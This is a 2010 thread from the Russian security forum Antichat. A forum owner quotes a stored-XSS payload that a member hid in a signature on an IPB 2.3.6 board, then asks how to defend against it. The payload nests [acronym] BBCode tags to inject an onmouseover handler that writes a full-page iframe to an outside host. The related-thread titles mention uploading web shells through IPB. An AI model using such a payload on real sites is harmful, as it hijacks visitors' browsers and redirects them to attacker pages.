ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Пытаются ломануть через тег ipb
  #1  
Старый 07.03.2010, 14:41
Аватар для goha
goha
Новичок
Регистрация: 16.11.2009
Сообщений: 6
Провел на форуме:
30843

Репутация: 0
По умолчанию Пытаются ломануть через тег ipb

Есть форум ipb 2 3 6

один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код

Код HTML:
[color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color]

вот как работает тег акронима:
Код:
[acronym='Laugh Out Loud']lol[/acronym]


<acronym title='{option}'>{content}</acronym>
Как защититься и что делать?

Последний раз редактировалось goha; 30.03.2010 в 19:06..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как можно просмотреть ник через id в IPB 1.3 final? Debra Форумы 19 08.03.2007 21:51
Получение шела через Cgi приложения k00p3r Чужие Статьи 0 08.06.2005 15:04
Как можно загрузить шелл в ipb через смайлики? dyx Форумы 3 14.05.2005 14:04
Залить шелл через подделку http запросов, на примере ipb 1.3 SURRENDER Форумы 25 13.04.2005 15:37
Как залить шелл через IPB форум, при отсутствии ftp? bbmz Форумы 1 26.11.2004 18:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ